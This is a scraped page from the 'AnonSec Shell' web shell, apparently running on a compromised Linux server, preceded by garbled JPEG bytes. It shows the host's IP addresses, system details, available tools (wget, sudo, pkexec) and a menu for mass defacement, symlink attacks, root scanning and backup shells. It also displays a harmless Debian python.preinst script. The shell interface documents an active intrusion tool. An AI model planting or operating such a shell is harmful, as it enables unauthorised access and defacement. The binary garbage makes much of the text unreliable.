JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/23604/root/var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/23604/root/var/lib/dpkg/info/python.preinst
#! /bin/sh
set -e

# remove the python alternatives before installing our own python link

update-alternatives --auto /usr/bin/python >/dev/null 2>&1 || true
update-alternatives --remove python /usr/bin/python1.5 || true
update-alternatives --remove python /usr/bin/python2.1 || true
update-alternatives --remove python /usr/bin/python2.2 || true

[ -L /usr/share/doc/python/html ] || rm -rf /usr/share/doc/python/html

case "$1" in
    upgrade)
        if dpkg --compare-versions $2 lt 2.6.1-1~; then
	    oldv=$(echo $2 | sed 's/^\(...\).*/\1/')
	    if [ "$DEBIAN_FRONTEND" != noninteractive ]; then
		echo "running python pre-rtupdate hooks for python2.7..."
	    fi
	    for hook in /usr/share/python/runtime.d/*.rtupdate; do
		[ -x $hook ] || continue
		if ! $hook pre-rtupdate python$oldv python2.7; then
		    hb=$(basename $hook .rtupdate)
		    echo >&2 "error running python pre-rtupdate hook $hb"
		    echo >&2 "running python failed-pre-rtupdate hook $hb"
		    $hook failed-pre-rtupdate python$oldv python2.7
		    errors=yes
		    break
		fi
	    done
	    [ -z "$errors" ] || exit 3
	fi

	# 2.4.4-5 is the first version, which adds python2.5 as supported
	# version; need to run an rtinstall python2.5 in the postinst.
        if dpkg --compare-versions $2 lt 2.4.4-5 && [ -x /usr/bin/python2.5 ]; then
	    version=$(dpkg -s python2.5-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.5_already_installed
	fi

	# 2.5.4-6 is the first version, which adds python2.6 as supported
	# version; need to run an rtinstall python2.6 in the postinst.
        if dpkg --compare-versions $2 lt 2.5.4-6 && [ -x /usr/bin/python2.6 ]; then
	    version=$(dpkg -s python2.6-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.6_already_installed
	fi

	# 2.6.6-13 is now the first version, which adds python2.7 as supported
	# version; need to run an rtinstall python2.7 in the postinst.
        if dpkg --compare-versions $2 lt 2.6.6-13 && [ -x /usr/bin/python2.7 ]; then
	    version=$(dpkg -s python2.7-minimal | awk '/^Version:/ {print $2}')
	    mkdir -p /var/lib/python
	    echo "$version" > /var/lib/python/python2.7_already_installed
	fi
esac



Anon7 - 2022
AnonSec Team